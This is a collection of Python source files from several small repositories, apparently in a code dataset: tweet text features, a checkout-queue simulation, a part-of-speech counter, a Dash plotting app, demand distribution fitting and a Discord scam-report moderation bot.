in_dict_words = set()\n        for tweet in tweets:\n            for word in tweet:\n                if word.replace('\'', '').replace('-', '').isalpha() and not self.d.check(\n                        word) and not self.d_sp.check(word) and (word not in self.brands) and ('URL' not in word) and (\n                        'NUMBER' not in word):\n                    self.sm.set_seq1(seq1=word)\n                    founded = False\n                    for suggestion in self.d.suggest(word):\n                        self.sm.set_seq2(seq2=suggestion)\n                        if self.sm.ratio() > WORD_DIST_RATIO:\n                            out_of_dict_words.add(word)\n                            founded = True\n                            break\n                    if not founded:\n                        in_dict_words.add(word)\n                else:\n                    in_dict_words.add(word)\n        #return len(out_of_dict_words), len(out_of_dict_words) + len(in_dict_words)\n        if len(out_of_dict_words) + len(in_dict_words) > 0:\n            return len(out_of_dict_words) / (len(out_of_dict_words) + len(in_dict_words))\n        else:\n            return 0\n\n#tweets = dr.load_dataset()\n#o1 = OutOfDictWordsFeature()\n#print(type(o1).__name__)\n#odwf = FeatureWithStorage(OutOfDictWordsFeature(), 'abc.shelve')\n# for user in tweets:\n#     print(user)\n#     print(odwf.extract_feature('36b2593435e1bed13eb138c1973c13ed', tweets['36b2593435e1bed13eb138c1973c13ed'].tweets))\n#     break\n","repo_name":"mgluhak/TAR-Project","sub_path":"features/out_of_dict_words_feature.py","file_name":"out_of_dict_words_feature.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"17324708079","text":"from numaleatorios import Aleatorio\r\nimport math\r\nimport statistics\r\nfrom scipy.stats import expon\r\nimport numpy as np\r\n\r\n# prueba = np.random.exponential(8)\r\n# print(prueba)\r\n\r\nrandom = Aleatorio()\r\n\r\nclass Evento():\r\n\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.tipo_evento = \"\"\r\n        self.tiempo_creacion = 0\r\n        self.tiempo_salida = 0\r\n    \r\n# Simulation in minutes\r\n\r\n## Creating the arrivals\r\ntiempo = 0\r\n# SIMULATION FOR 80 HOURS, IN MINUTES = 4800\r\ntiempo_max = 4800\r\n# LIST WHERE ALL THE EVENTS WILL BE STORED\r\neventos = []\r\n# LOOP FOR THE FAST CUSTOMERS' ARRIVALS\r\nwhile(tiempo < tiempo_max):\r\n    evento = Evento()\r\n    # tiempo = tiempo + random.exponencial(8) # EXPONENTIAL ARRIVAL TIME WITH A MEAN OF 8 MINUTES\r\n    tiempo = tiempo + np.random.exponential(8) # EXPONENTIAL ARRIVAL TIME WITH A MEAN OF 8 MINUTES\r\n    evento.tiempo_creacion = tiempo \r\n    evento.tiempo_evento = evento.tiempo_creacion\r\n    evento.tipo_evento = \"llegada_rapida\"\r\n    eventos.append(evento)\r\n\r\ntiempo = 0\r\n    \r\n# LOOP FOR THE SLOW CUSTOMERS' ARRIVALS\r\nwhile(tiempo < tiempo_max):\r\n    evento = Evento()\r\n    # tiempo = tiempo + random.exponencial(20) # EXPONENTIAL ARRIVAL TIME WITH A MEAN OF 20 MINUTES\r\n    tiempo = tiempo + np.random.exponential(20) # EXPONENTIAL ARRIVAL TIME WITH A MEAN OF 20 MINUTES\r\n    evento.tiempo_creacion = tiempo \r\n    evento.tiempo_evento = evento.tiempo_creacion\r\n    evento.tipo_evento = \"llegada_lenta\"\r\n    eventos.append(evento)\r\n    \r\ntiempo = 0 \r\n# LOOP FOR THE SCANNER\r\nwhile(tiempo < tiempo_max):\r\n    evento = Evento()\r\n    tiempo = tiempo + 1 # WE ADD 1 MINUTE TO THE SCANNER TO CHECK EVERY 1 MINUTE\r\n    evento.tiempo_creacion = tiempo \r\n    evento.tiempo_evento = evento.tiempo_creacion\r\n    evento.tipo_evento = \"escaner\"\r\n    eventos.append(evento)\r\n\r\n## Start of the simulation \r\ntiempo = 0\r\ncola_de_espera_Rapida = []\r\ncola_de_espera_Lenta = []\r\nsalidas = []\r\ncajera_caja_rapida_ocupada = False\r\ncajera_caja_lenta_ocupada = False\r\nlistaClientesEnColaDeEsperaRapida = 
[]\r\nlistaClientesEnColaDeEsperaLenta = []\r\n# piezas_max = 0\r\n\r\n# SIMULACIÓN PARA LA CAJA RÁPIDA\r\nwhile(tiempo < tiempo_max):\r\n eventos.sort(key=lambda x:x.tiempo_evento)\r\n evento = eventos.pop(0) ## Evento proximo\r\n tiempo = evento.tiempo_evento\r\n \r\n if(evento.tipo_evento==\"escaner\"):\r\n listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida))\r\n listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta))\r\n \r\n if(evento.tipo_evento == \"llegada_rapida\"):\r\n if(len(cola_de_espera_Rapida) == 0 and cajera_caja_rapida_ocupada == False):\r\n cajera_caja_rapida_ocupada = True\r\n evento.tiempo_inspeccion = tiempo\r\n evento.tiempo_evento = tiempo + np.random.exponential(2) ##TIEMPO EN QUE ATIENDEN EN LA CAJA RÁPIDA\r\n evento.prevEvento = evento.tipo_evento\r\n evento.tipo_evento =\"salida_atendido_rapido\"\r\n evento.tiempo_salida_rapido = evento.tiempo_evento\r\n eventos.append(evento)\r\n #AGREGAR QUE HAY 0 PERSONAS EN LA COLA\r\n # listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida))\r\n else:\r\n cola_de_espera_Rapida.append(evento)\r\n # listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA COLA DE ESPERA\r\n \r\n \r\n \r\n \r\n elif( evento.tipo_evento == \"salida_atendido_rapido\"):\r\n cajera_caja_rapida_ocupada = False\r\n evento.tiempo_salida_rapido = tiempo\r\n salidas.append(evento)\r\n if(len(cola_de_espera_Rapida)>0):\r\n pieza = cola_de_espera_Rapida.pop(0)\r\n cajera_caja_rapida_ocupada = True\r\n pieza.tiempo_inspeccion = tiempo\r\n pieza.tiempo_evento = tiempo + np.random.exponential(2) ##TIEMPO EN QUE ATIENDEN EN LA CAJA RAPIDA \r\n pieza.tiempo_salida = pieza.tiempo_evento\r\n pieza.prevEvento = pieza.tipo_evento\r\n pieza.tipo_evento =\"salida_atendido_rapido\"\r\n eventos.append(pieza)\r\n # listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA COLA DE ESPERA\r\n \r\n \r\n \r\n elif(evento.tipo_evento == \"llegada_lenta\"):\r\n if(len(cola_de_espera_Lenta) == 0 and cajera_caja_lenta_ocupada == False):\r\n cajera_caja_lenta_ocupada = True\r\n evento.tiempo_inspeccion = tiempo\r\n evento.tiempo_evento = tiempo + np.random.exponential(16.4) ##TIEMPO EN QUE ATIENDEN EN LA CAJA RÁPIDA\r\n evento.prevEvento = evento.tipo_evento\r\n evento.tipo_evento =\"salida_atendido_lento\"\r\n evento.tiempo_salida_lento = evento.tiempo_evento\r\n eventos.append(evento)\r\n #AGREGAR QUE HAY 0 PERSONAS EN LA COLA\r\n # listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta))\r\n else:\r\n cola_de_espera_Lenta.append(evento)\r\n # listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA COLA DE ESPERA\r\n \r\n elif( evento.tipo_evento == \"salida_atendido_lento\"):\r\n cajera_caja_lenta_ocupada = False\r\n evento.tiempo_salida_lento = tiempo\r\n salidas.append(evento)\r\n if(len(cola_de_espera_Lenta)>0):\r\n pieza = cola_de_espera_Lenta.pop(0)\r\n cajera_caja_lenta_ocupada = True\r\n pieza.tiempo_inspeccion = tiempo\r\n pieza.tiempo_evento = tiempo + np.random.exponential(16.4) ##TIEMPO EN QUE ATIENDEN EN LA CAJA LENTA \r\n pieza.tiempo_salida = pieza.tiempo_evento\r\n pieza.prevEvento = pieza.tipo_evento\r\n pieza.tipo_evento =\"salida_atendido_lento\"\r\n eventos.append(pieza)\r\n # listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA 
COLA DE ESPERA\r\n\r\n\r\n\r\n# for x in listaClientesEnColaDeEsperaRapida:\r\n#     print ( x )\r\n\r\n\r\n# print(\"separacion\")\r\n\r\n# for x in listaClientesEnColaDeEsperaLenta:\r\n#     print ( x )\r\n\r\n\r\ndef promediarLista(lista):\r\n    sum=0.0\r\n    for i in range(0,len(lista)):\r\n        sum=sum+lista[i]\r\n\r\n    return sum/len(lista)\r\n\r\npromedio1 = promediarLista(listaClientesEnColaDeEsperaRapida)\r\n\r\npromedio2 = promediarLista(listaClientesEnColaDeEsperaLenta)\r\n\r\n# promedio1 = mean(listaClientesEnColaDeEsperaRapida)\r\n\r\n# print (promedio1)\r\n\r\n# print (promedio2)\r\nprint(\"Promedio de clientes en cola rápida: \")\r\nprint(statistics.mean(listaClientesEnColaDeEsperaRapida)) #Utilizando el método que me comentó el profe\r\nprint(\"Promedio de clientes en cola lenta: \")\r\nprint(statistics.mean(listaClientesEnColaDeEsperaLenta)) #Utilizando el método que me comentó el profe\r\n\r\n\r\n","repo_name":"LuisArzola21041999/ProModelPython","sub_path":"proyecto.py","file_name":"proyecto.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18111664896","text":"# Find common linguistic patterns\n# in Donald Trump Tweets\n\nimport re\n\n# Get the contents of the file\n# Delimit by spaces and grab the last element\nf = open('./trump_tweets_pos.txt', 'r')\n\n# Make a list of pos\npos_lines = []\n\n# make a list of pos in tweets\ntweet_patterns = []\n\n# Make a dictionary with the pos as the key and the item\n# as a list of words associated with the pos\nwords = dict()\nisfound = False\n\n# Regex patterns for links, bare domains, e-mail addresses and phone numbers\nNOISE_PATTERNS = [\".*:\\/\\/.*\", \".*\\..*\\..*\\/.*\", \".*@.*\\..*\", \"[\\+]?[\\d]*[\\.|\\-]?[(]?[\\d]{3}[)]?[\\.|\\-]*[\\d]{3}[\\.|\\-]*[\\d]{4}\"]\n\ndef is_noise(word):\n    # True for links, @-mentions, #-hashtags and phone numbers, which are not real words\n    return \"@\" in word or \"#\" in word or any(re.search(p, word) for p in NOISE_PATTERNS)\n\n# Loop through all of the pos data\nfor pos in f:\n    # print(\"i:\", i, \",\", pos)\n    # Delimit the line by space\n    line_split = pos.split(\" \")\n    # Get the word\n    word = line_split[0].lower()\n    # Get the pos\n    part_of_speech = line_split[-1].replace(\"\\n\", \"\")\n    # Determine if the part of speech is a key in the dictionary\n    # and the word is not a link or @ or #\n    if part_of_speech in words and not is_noise(word):\n        for j, tup in enumerate(words[part_of_speech]):\n            if word == tup[0]:\n                words[part_of_speech][j] = (word, tup[1] + 1)\n                isfound = True\n                break\n            else:\n                isfound = False\n\n        if not isfound:\n            words[part_of_speech].append((word, 1))\n        isfound = False\n\n    elif not is_noise(word):\n        words[part_of_speech] = [(word, 1)]\n        pos_lines.append(part_of_speech)\n\n\n# Make a temporary list to hold individual tweet patterns\ntemp = []\nfor p in pos_lines:\n\n    # See if the tweet ended\n    if p == \".\":\n        # add the tweet pattern to the list\n        tweet_patterns.append(temp)\n        # clear the temporary list\n        temp = []\n    else:\n        temp.append(p)\n\n# print(pos_lines)\n# print(\"Tweet Patterns: \", tweet_patterns)\n# print('\\n')\n# print(words)\n\n\nbigram_pos_counts = dict()\n\nfor tweet in tweet_patterns:\n    for i in range(len(tweet)-1):\n        bigram_pos = (tweet[i], 
tweet[i+1])\n if bigram_pos in bigram_pos_counts:\n bigram_pos_counts[bigram_pos] += 1\n else:\n bigram_pos_counts[bigram_pos] = 1\n\nprint()\nprint(bigram_pos_counts)\nf.close()\n\nfor pos in words:\n words[pos].sort(key=lambda e: -e[1])\n\nf = open('trump-pos-corpus.txt', 'w')\n\nfor pos in words:\n f.write(pos + \":\" + str(words[pos]) + '\\n\\n')\n\nf.close()\nprint('done')\n\n","repo_name":"SandeepJala94/HackUMass2017","sub_path":"py/copy-POS_Parser.py","file_name":"copy-POS_Parser.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"39753123853","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nfrom app import app\n\nimport plotly.graph_objs as go\nimport pandas as pd\nimport re\n\n\nparameters = dict()\nparameters['ngenes'] = 3\nparameters['colours'] = 7\nparameters['metric_colours'] = 9\nparameters['builds'] = 10\nparameters['njiggle'] = 100\nparameters['threshold'] = 50\n\nfilepath = 'http://files.tcm.phy.cam.ac.uk/~vatj2/Polyominoes/data/gpmap/V5/meeting/'\nset_filename = 'SetMetrics_N{ngenes}_C{colours}_T{threshold}_B{builds}_Cx{metric_colours}_J{njiggle}_Iso.txt'.format(**parameters)\nset_names = ['srobustness', 'interrobustness', 'evolvability', 'rare', 'loop', 'analysed', 'total_neutral', 'diversity', 'pIDs']\n\ndf_ref1 = pd.read_csv(filepath + set_filename, sep=\" \", header=None, names=set_names)\n\nset_filename = 'SetMetrics2_N{ngenes}_C{colours}_T{threshold}_B{builds}_Cx{metric_colours}_J{njiggle}_Iso.txt'.format(**parameters)\n\ndf_ref2 = pd.read_csv(filepath + set_filename, sep=\" \", header=None, names=set_names)\n\ndf_ref1['evo'] = df_ref1['evolvability'] - df_ref1['rare'] - df_ref1['loop']\ndf_ref2['evo'] = df_ref2['evolvability'] - df_ref2['rare'] - df_ref2['loop']\nset_names.insert(3, 'evo')\n\n\nlayout = html.Div(children=[\n html.H3(children='Reproducibility'),\n dcc.Dropdown(id='dropdown-reproducibility-x',\n value=set_names[0],\n options=[{'label': i, 'value': i} for i in set_names[:-1]],\n multi=False, placeholder='x-axis, ' + set_names[0]),\n dcc.Dropdown(id='dropdown-reproducibility-y',\n value=set_names[1],\n options=[{'label': i, 'value': i} for i in set_names[:-1]],\n multi=False, placeholder='y-axis, ' + set_names[1]),\n dcc.Graph(id='graph-container-reproducibility-set')\n], className=\"content\")\n\n\n@app.callback(\n Output('graph-container-reproducibility-set', 'figure'),\n [Input('dropdown-reproducibility-x', 'value'),\n Input('dropdown-reproducibility-y', 'value')])\ndef update_figure(dropdown_x, dropdown_y):\n if dropdown_x is None:\n xaxis = set_names[0]\n else:\n xaxis = dropdown_x\n if dropdown_y is None:\n yaxis = set_names[1]\n else:\n yaxis = dropdown_y\n\n traces = []\n\n traces.append(go.Scatter(\n x=df_ref1[xaxis], y=df_ref1[yaxis], text=df_ref1.pIDs, mode='markers'))\n traces.append(go.Scatter(\n x=df_ref2[xaxis], y=df_ref2[yaxis], text=df_ref2.pIDs, mode='markers'))\n\n return {'data' : traces,\n 'layout': go.Layout(\n xaxis={'title' : xaxis}, yaxis={'title' : yaxis},\n hovermode='closest')}\n","repo_name":"vatj/DashPolyomino","sub_path":"apps/app_reproducibility_scatter.py","file_name":"app_reproducibility_scatter.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13680791045","text":"#!/usr/bin/python3\n\n#importando los paquetes\nimport numpy as 
np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy.stats as spsts\nimport datetime\nfrom scipy import stats\nimport tikzplotlib as tikz\n\n\n#=================================FUNCIONES==================================\ndef acondicionar_datos(json, tiempo):\n\tdf = pd.read_json(json) #se carga el frame de datos\n\tdf = np.array(df) #se convierte el frame en un array\n\t\n\t#se extraen las fechas y las demandas en arreglos separados\n\tmuestras = len(df)\n\tvector_fecha = []; demanda = []\n\tfor datos in range(muestras):\n\t\t\n\t\thora = df[datos][0]['fechaHora']\n\t\tif int(hora[11:13]) == tiempo:\n\t\t\tdemanda.append(df[datos][0]['MW'])\n\t\n\treturn demanda\n\t\t\n#===============================================================================\ndef evaluar_modelos(datos, dists, Bins, hora):\n\t#condiciones iniciales\n\trmse_min = np.inf\n\tp_max = 0 #El mejor p en chisqr test\n\tkspmax = 0 #El mejor p en KStest\n\tnp.seterr(all = 'ignore')\n\n\t#Se prepara el espacio de visualizacion:\n\tfig, ax = plt.subplots(1, 3, figsize = (16, 5), tight_layout = True)\n\t#fig1:\n\tax[0].set_title('Distribución observada: demanda a las {}'.format(datetime.time(hora)))\n\tax[0].set_xlabel('Potencia [MW]')\n\tax[0].set_ylabel('Frecuencia')\n\t#fig2:\n\tax[1].set_title('Ajuste por funciones de densidad')\n\tax[1].set_ylabel('Frecuencia')\n\tax[1].set_xlabel('Potencia [MW]')\n\t#fig3:\n\tax[2].set_title('Mejor ajuste basado en criterios de bondad')\n\tax[2].set_ylabel('Frecuencia')\n\tax[2].set_xlabel('Potencia [MW]')\n\t\n\t#Distribucion observada:\n\tocurrencias_exp, bins = np.histogram(datos, bins = Bins)\n\tfor i in range(Bins):\n\t\tif ocurrencias_exp[i] == 0:\n\t\t\tocurrencias_exp[i] = 1\n\n\tbins_centrados = (bins + np.roll(bins, -1))[:-1] / 2.0 \n\tescala = len(datos) * (max(datos) - min(datos)) / len(bins_centrados)\n\t\n\t#Probando las distribuciones ingresadas\n\tfor distribucion in dists:\n\t\tdist = getattr(spsts, distribucion)\n\t\tparam = dist.fit(datos)\n\t\tpdf = dist.pdf(bins_centrados, *param)\n\t\tpdf_plot = dist.pdf(np.arange(min(datos) * 0.96, max(datos) * 1.04, 1), *param)\n\t\tocurrencias_teo = [int(round(freq)) for freq in escala * pdf]\n\t\tax[1].plot(np.arange(min(datos) * 0.96, max(datos) * 1.04, 1), escala * pdf_plot, lw = 3.5, label = '{}'.format(distribucion))\n\t\t\n\t\t#Bondad de ajuste por chisquare:\n\t\tcoef_chi, p = spsts.chisquare(f_obs = ocurrencias_teo, f_exp = ocurrencias_exp)\n\t\tif p > p_max:\n\t\t\tp_max = p\n\t\t\tdist_chi = distribucion\n\t\t\tmod_chi = dist, param, pdf\n\t\t\n\t\t#Bondad de ajuste por RMSE(Root-Mean-Square Error):\n\t\tdiferencia = (ocurrencias_teo - ocurrencias_exp)**2\n\t\trmse = np.sqrt(np.mean(diferencia))\n\t\tif rmse < rmse_min:\n\t\t\trmse_min = rmse\n\t\t\tdist_rmse = distribucion\n\t\t\tmod_rmse = dist, param, pdf\n\t\n\t\t#Bondad de ajuste por Kolvogorov-Smirnov:\n\t\tD, ksp = spsts.kstest(datos, distribucion, args = param)\n\t\tif ksp > kspmax:\n\t\t\tkspmax = ksp\n\t\t\tdist_ks = distribucion\n\n\t#visualizando resultados:\n\tax[0].hist(datos, bins = Bins, color = 'tomato', histtype='bar', rwidth=0.8)\n\tax[1].hist(datos, bins = Bins, color = 'palevioletred', histtype='bar', rwidth=0.8)\n\tax[2].hist(datos, bins = Bins, color = 'b')\n\t\t\n\tif dist_chi == dist_rmse or dist_chi == dist_ks:\n\t\tparams = mod_chi[1]\n\t\tmejor_ajuste = dist_chi\n\t\tax[2].hist(datos, bins = Bins, color = 'cornflowerblue', label = 'Distribución observada')\n\t\tax[2].bar(bins_centrados, mod_chi[2] * escala, width = 6, color = 
'r', label = 'Mejor ajuste: {}'.format(dist_chi))\n\t\tm, v, s, k = mod_chi[0].stats(*params, moments = 'mvsk')\n\n\telif dist_rmse == dist_ks:\n\t\tparams = mod_rmse[1]\n\t\tmejor_ajuste = dist_rmse\n\t\tax[2].hist(datos, bins = Bins, color = 'cornflowerblue', label = 'Distribución observada')\n\t\tax[2].bar(bins_centrados, mod_rmse[2] * escala, width = 6, color = 'r', label = 'Mejor ajuste: {}'.format(dist_rmse))\n\t\tm, v, s, k = mod_rmse[0].stats(*params, moments = 'mvsk')\n\n\telse:\n\t\t# fallback: if the three goodness-of-fit criteria all disagree, default to the chi-square winner\n\t\t# (without this branch, mejor_ajuste/params/m,v,s,k would be unbound and the summary below would raise NameError)\n\t\tparams = mod_chi[1]\n\t\tmejor_ajuste = dist_chi\n\t\tax[2].hist(datos, bins = Bins, color = 'cornflowerblue', label = 'Distribución observada')\n\t\tax[2].bar(bins_centrados, mod_chi[2] * escala, width = 6, color = 'r', label = 'Mejor ajuste: {}'.format(dist_chi))\n\t\tm, v, s, k = mod_chi[0].stats(*params, moments = 'mvsk')\n\n\t#imprimiendo resumen y resultados:\n\n\tprint('Resumen:\\nEl mejor ajuste por RMSE ocurre con la distribución', dist_rmse)\n\tprint('El mejor ajuste por chisquare ocurre con la distribución', dist_chi)\n\tprint('El mejor ajuste por Kolmogorov ocurre con la distribución', dist_ks)\n\tprint('Mejor modelo ajustado por criterios de bondad:', mejor_ajuste)\n\tprint('Cantidad de muestras:', len(datos))\n\tprint('.\\n.\\n.\\n.\\nMomentos centrales para el mejor ajuste:', '\\nMedia:', m, '\\nVarianza:', v, '\\nCoef. Simetría:', s, '\\nCurtosis:', k)\n\tax[1].legend()\n\tax[2].legend()\n\tplt.show()\n\n#================================================================================================\n\n\ndistribuciones = ['norm', 'rayleigh', 'expon', 'uniform', 'burr12', 'alpha', 'gamma', 'beta', 'pareto']\nhora = 3\ndemandas = acondicionar_datos('demanda_2019.json', hora)\nmodelo = evaluar_modelos(demandas, distribuciones, 15, hora)\n\n\n\n\n\n\n\n\n","repo_name":"JeaustinSirias/Simulacion_de_aplicaciones_teoria_probabilidad_ing_electrica","sub_path":"misc/P2/scr/source_code.py","file_name":"source_code.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4272734012","text":"# bot.py\r\nimport discord\r\nfrom discord.ext import commands\r\nimport os\r\nimport json\r\nimport logging\r\nimport re\r\nfrom report import Report\r\nfrom database import Database\r\nfrom unidecode import unidecode \r\n\r\n# Set up logging to the console\r\nlogger = logging.getLogger('discord')\r\nlogger.setLevel(logging.DEBUG)\r\nhandler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\r\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\r\nlogger.addHandler(handler)\r\n\r\n# There should be a file called 'tokens.json' inside the same folder as this file\r\ntoken_path = 'tokens.json'\r\nif not os.path.isfile(token_path):\r\n    raise Exception(f\"{token_path} not found!\")\r\nwith open(token_path) as f:\r\n    # If you get an error here, it means your token is formatted incorrectly. Did you put it in quotes?\r\n    tokens = json.load(f)\r\n    discord_token = tokens['discord']\r\n    perspective_key = tokens['perspective']\r\n\r\n\r\nclass ModBot(discord.Client):\r\n    def __init__(self, key):\r\n        intents = discord.Intents.default()\r\n        super().__init__(command_prefix='.', intents=intents)\r\n        self.group_num = None\r\n        self.group_channel = None # Main group channel\r\n        self.mod_channels = {} # Map from guild to the mod channel id for that guild\r\n        self.reports = {} # Map from user IDs to the state of their report\r\n        self.reported = {} # Map from message IDs to boolean to forward\r\n        self.perspective_key = key\r\n        self.db = Database()\r\n\r\n    async def on_ready(self):\r\n\r\n        print(f'{self.user.name} has connected to Discord! 
It is these guilds:')\r\n for guild in self.guilds:\r\n print(f' - {guild.name}')\r\n print('Press Ctrl-C to quit.')\r\n\r\n # Parse the group number out of the bot's name\r\n match = re.search('[gG]roup (\\d+) [bB]ot', self.user.name)\r\n if match:\r\n self.group_num = match.group(1)\r\n else:\r\n raise Exception(\"Group number not found in bot's name. Name format should be \\\"Group # Bot\\\".\")\r\n \r\n # Find the mod channel in each guild that this bot should report to\r\n for guild in self.guilds:\r\n for channel in guild.text_channels:\r\n if channel.name == f'group-{self.group_num}':\r\n self.group_channel = channel\r\n if channel.name == f'group-{self.group_num}-mod':\r\n self.mod_channels[guild.id] = channel\r\n\r\n async def on_raw_reaction_add(self, payload):\r\n '''\r\n This function is called whenever a user reacts to a message in a channel that the bot can see.\r\n Currently the bot is configured to send a message describing the action taken to the \"group-#-mod\" channel.\r\n '''\r\n if payload.guild_id not in self.mod_channels:\r\n return\r\n if payload.channel_id != self.mod_channels[payload.guild_id].id:\r\n return\r\n mod_channel = self.mod_channels[payload.guild_id]\r\n message = await mod_channel.fetch_message(payload.message_id)\r\n \r\n # Make sure it's a report forwarded by the bot\r\n if message.reference is not None or message.author.id != self.user.id:\r\n return\r\n\r\n # Get message ID from forwarded report content\r\n original_message_ID = int(message.content.split(' ')[4])\r\n original_message = None\r\n try:\r\n original_message = await self.group_channel.fetch_message(original_message_ID)\r\n except:\r\n return\r\n\r\n if payload.emoji.name == '👍':\r\n r = (f\"Sufficient public indication that Tweet is a scam according to {payload.member.name}. \"\r\n \"Applying warning to Tweet. \"\r\n \"Please reply to this message with a content reviewer report. \"\r\n )\r\n prompt = await message.reply(r)\r\n # Marks as requiring content review report\r\n self.db.add_prompt(prompt.id, original_message_ID)\r\n await original_message.reply('Warning: Tweet has been confirmed to be a scam by the content moderation team.')\r\n elif payload.emoji.name == '👎':\r\n r = (f\"Insufficient public indication that Tweet is a scam according to {payload.member.name}. \"\r\n \"Applying warning to Tweet. \"\r\n )\r\n await message.reply(r)\r\n self.db.add_not_severe(original_message_ID)\r\n await original_message.reply('Warning: Tweet has been reported by users as a scam.')\r\n elif payload.emoji.name == '❌':\r\n await original_message.delete()\r\n r = (f\"Previous content reviewer reports suggest Tweet should be deleted according to {payload.member.name}. \"\r\n \"Deleting Tweet.\"\r\n )\r\n await message.reply(r)\r\n \r\n async def on_message(self, message):\r\n '''\r\n This function is called whenever a message is sent in a channel that the bot can see (including DMs). \r\n Currently the bot is configured to only handle messages that are sent over DMs or in your group's \"group-#\" channel. 
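Messages authored by the bot itself are ignored.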
\r\n '''\r\n # Ignore messages from us \r\n if message.author.id == self.user.id:\r\n return\r\n \r\n # Check if this message was sent in a server (\"guild\") or if it's a DM\r\n if message.guild:\r\n await self.handle_channel_message(message)\r\n else:\r\n await self.handle_dm(message)\r\n \r\n async def on_message_edit(self, before, after):\r\n \"\"\"\r\n This function is called whenever a message is edited.\r\n The bot is configured to check if a cryptoaddress has been edited, and whether or not the new message contains a\r\n blacklisted crypto address.\r\n \"\"\"\r\n with open(\"blacklist.txt\", \"r\") as file:\r\n addresses = file.readlines()\r\n for add in addresses:\r\n add = add.strip()\r\n if add in after.content:\r\n r = \"Message has been edited to contain fraudulent or suspicious crypto addresses. \"\r\n await after.reply(r)\r\n break\r\n elif add in before.content:\r\n r = \"Message previously containing fraudulent/suspicious crypto addresses have been edited to contain a new crypto address.\"\r\n await after.reply(r)\r\n break\r\n file.close()\r\n \r\n async def fwd_reported(self, message_id):\r\n message = await self.group_channel.fetch_message(message_id)\r\n # Forward the message to the mod channel\r\n mod_channel = self.mod_channels[message.guild.id]\r\n\r\n fwd = f'Forwarded message with ID {message.id} \\n{message.author.name}: \"{message.content}\"'\r\n\r\n fwd += '\\n\\nPrevious content reviewer reports include the following: '\r\n message_info = self.db.get_cr_reports(message.id)\r\n if message_info == None:\r\n fwd += '\\nNo reports found.'\r\n else:\r\n for i in range(1, message_info['cr_report_count'] + 1):\r\n report = message_info['cr_reports'][i]\r\n author = report['author']\r\n desc = report['description']\r\n time = report['time']\r\n fwd += f'\\nBy {author} at {time}: \"{desc}\"'\r\n fwd += '\\n\\nPlease review public engagement with Tweet and react to this message with 👍 if it suggests the Tweet is a scam.'\r\n fwd += ' In this case, you will be asked to submit a content reviewer report.'\r\n fwd += ' Otherwise, react with 👎.'\r\n fwd += ' If prior reviews indicate the original message should be deleted, react with ❌.'\r\n await mod_channel.send(fwd)\r\n\r\n async def handle_dm(self, message):\r\n # Handle a help message\r\n if message.content == Report.HELP_KEYWORD:\r\n reply = \"Use the `report` command to begin the reporting process.\\n\"\r\n reply += \"Use the `cancel` command to cancel the report process.\\n\"\r\n print(\"Send reply to help\")\r\n await message.channel.send(reply)\r\n return\r\n\r\n author_id = message.author.id\r\n responses = []\r\n\r\n # Only respond to messages if they're part of a reporting flow\r\n if author_id not in self.reports and not message.content.startswith(Report.START_KEYWORD):\r\n return\r\n\r\n # If we don't currently have an active report for this user, add one\r\n if author_id not in self.reports:\r\n self.reports[author_id] = Report(self)\r\n \r\n # Let the report class handle this message; forward all the messages it returns to us\r\n responses = await self.reports[author_id].handle_message(message)\r\n for r in responses:\r\n await message.channel.send(r)\r\n\r\n # If the report is complete or cancelled, remove it from our map\r\n if self.reports[author_id].report_complete():\r\n # Get message ID corresponding to report\r\n mid = self.reports[author_id].message_id\r\n # Message ID identified (report completed)\r\n if mid > 0:\r\n # Check if message should be forwarded\r\n if self.reports[author_id].should_fwd or 
self.db.get_not_severe(mid) > 2:\r\n await self.fwd_reported(mid)\r\n else:\r\n self.db.add_not_severe(mid)\r\n # Remove complete/conacelled report from our map\r\n self.reports.pop(author_id)\r\n\r\n async def handle_mod_message(self, message):\r\n # Handle replies to reports in \"group-#-mod\" channel\r\n if message.channel.name == f'group-{self.group_num}-mod':\r\n # Message is a reply and message is not from bot\r\n if message.reference is not None and message.author.id != self.user.id:\r\n # Get prompt message\r\n ref_id = message.reference.message_id\r\n original_id = self.db.get_message_from_prompt(ref_id)\r\n # Message requires content reviewer report\r\n if original_id != None:\r\n # Add report to database\r\n time = message.created_at.strftime(\"%m/%d/%Y, %H:%M:%S\")\r\n report = self.create_report(message.author.name, time, message.content)\r\n self.db.add_report(original_id, report)\r\n self.db.remove_prompt(ref_id)\r\n await message.reply(f'Successfully added content reviewer report for report message with ID {original_id}.')\r\n\r\n async def handle_channel_message(self, message):\r\n\r\n if message.channel.name == f'group-{self.group_num}-mod':\r\n await self.handle_mod_message(message)\r\n return\r\n\r\n # Only handle messages sent in the \"group-#\" channel\r\n if not message.channel.name == f'group-{self.group_num}':\r\n return \r\n\r\n # Automated flagging using blacklist\r\n if (self.check_blacklist(message)):\r\n await message.reply(\"Message contains fraudulent or suspicious 